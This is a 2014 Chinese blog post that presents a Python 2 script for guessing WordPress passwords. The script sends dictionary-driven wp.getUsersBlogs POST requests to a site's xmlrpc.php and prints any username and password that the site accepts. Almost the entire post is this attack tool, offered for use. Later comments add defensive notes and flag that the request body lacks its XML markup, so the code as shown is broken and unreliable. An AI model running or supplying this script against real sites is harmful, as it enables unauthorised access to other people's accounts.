根据freebuf代码修改,使用requests进行请求,中间使用连接符替换原有字符串相加,减少CPU运算量,以下为修改代码

# !/usr/bin/env python
#-*- coding: utf-8 -*-
#=============================================================================
#     FileName: wordpress_xmlrpc.py
#         Desc:
#       Author: 苦咖啡
#        Email: voilet@qq.com
#     HomePage: http://blog.kukafei520.net
#      Version: 0.0.1
#   LastChange: 2014-08-01
#      History: 
#=============================================================================
import requests

import re

def GetUrl():
    """Prompt for a WordPress host and return the URL of its xmlrpc.php.

    Only an optional leading "http://" is recognised and stripped before the
    scheme is re-added, so the returned URL always uses plain http.
    """
    site = raw_input("请输入wordpress站点:")
    # Group 2 is everything after the optional "http://" prefix.
    host = re.match(r"(http://)?(.*)", site).group(2)
    requrl = "http://%s/xmlrpc.php" % host
    print "尝试利用:"+requrl
    return requrl

def Aviable(requrl):
    """
    Send one GET to the XML-RPC endpoint and report whether it answered as expected.

    The check is an exact match on the body text
    "XML-RPC server accepts POST requests only.". A match shows only that the
    endpoint is reachable and XML-RPC is enabled; it says nothing about
    whether any account on the site has a guessable password.

    :param requrl: full URL of the site's xmlrpc.php (as built by GetUrl)
    :return: True on an exact body match; False on any other body or on any
             exception raised inside the try block (5 second timeout on the GET)
    """
    try:
        response = requests.get(requrl, timeout=5)
        if response.text != "XML-RPC server accepts POST requests only.":
            return False
        print "\n该站点存在此漏洞,尝试破解中:"
        return True
    except:
        # Bare except kept as in the original: every failure is reported the same way.
        print "抱歉,此站点漏洞不可用"
        return False



def Exploit():
    """
    说明:
    1.在本文件同目录下新建username.txt、password.txt分别存入用户名、密码字典
    2.按提示输入WordPress站点(例如:blog.kukafei520.net)

    """
    # NOTE: the docstring above is printed verbatim by the __main__ block, so it
    # is runtime output and is left exactly as the author wrote it.
    #
    # Purpose: an online password-guessing loop against WordPress XML-RPC. It
    # reads candidate names from username.txt and candidate passwords from
    # password.txt (both in the current directory) and POSTs one
    # wp.getUsersBlogs request per attempt to the URL returned by GetUrl().
    #
    # Defender's view: on the target this shows up as a run of POSTs to
    # /xmlrpc.php from one client, each naming wp.getUsersBlogs. Rate-limiting
    # or blocking xmlrpc.php where it is not needed, lockout on repeated failed
    # logins, and multi-factor authentication are the usual controls.
    requrl = GetUrl()

    # Only proceed when the endpoint answered the GET probe as expected.
    if Aviable(requrl):
        f_username = open("username.txt", "r")
        f_password = open("password.txt", "r")
        num = 0   # number of requests sent so far
        Flag = 0  # set to 1 once a response is treated as a successful login
        # Outer loop: lines of username.txt; inner loop: lines of password.txt.
        for name in f_username:
            if Flag == 1:
                break
            for key in f_password:
                # Progress output: a start banner, then a counter every 10 attempts.
                if num == 0:
                    print "开始尝试...."
                else:
                    if num % 10 == 0:
                        print "已尝试"+str(num)+"个"
                # NOTE(review): as shown, the body is the method name followed by the
                # raw name and key with no XML markup -- presumably the page's
                # HTML rendering dropped the tags; confirm against the original file.
                reqdata='wp.getUsersBlogs\
                        '+ name + \
                        ''+ key  +\
                        ''

                req = requests.post(url=requrl, data=reqdata)
                result = req.text
                num = num+1

                # A response containing "isAdmin" is treated as accepted credentials.
                if "isAdmin" in result:

                    # The name/password pair is printed to stdout in clear text.
                    hacker_data = "用户名: %s 密码: %s" % (name, key)
                    print hacker_data
                    Flag = 1

                    break

                # The non-empty literal "faultString" is always truthy, so this
                # condition evaluates as just `"403" in result`.
                elif "faultString" and "403" in result:
                    continue

                else:
                    print "Unknown error"
        f_username.close()
        f_password.close()
        # Flag still 0 here means no response contained "isAdmin".
        if not Flag:
            print "抱歉,在此字典中未找到正确的密码"

# Script entry point: print the usage text held in Exploit's docstring, then run it.
if __name__ == '__main__':
    print Exploit.__doc__
    Exploit()



八月 1st, 2014

Posted In: 网络技术
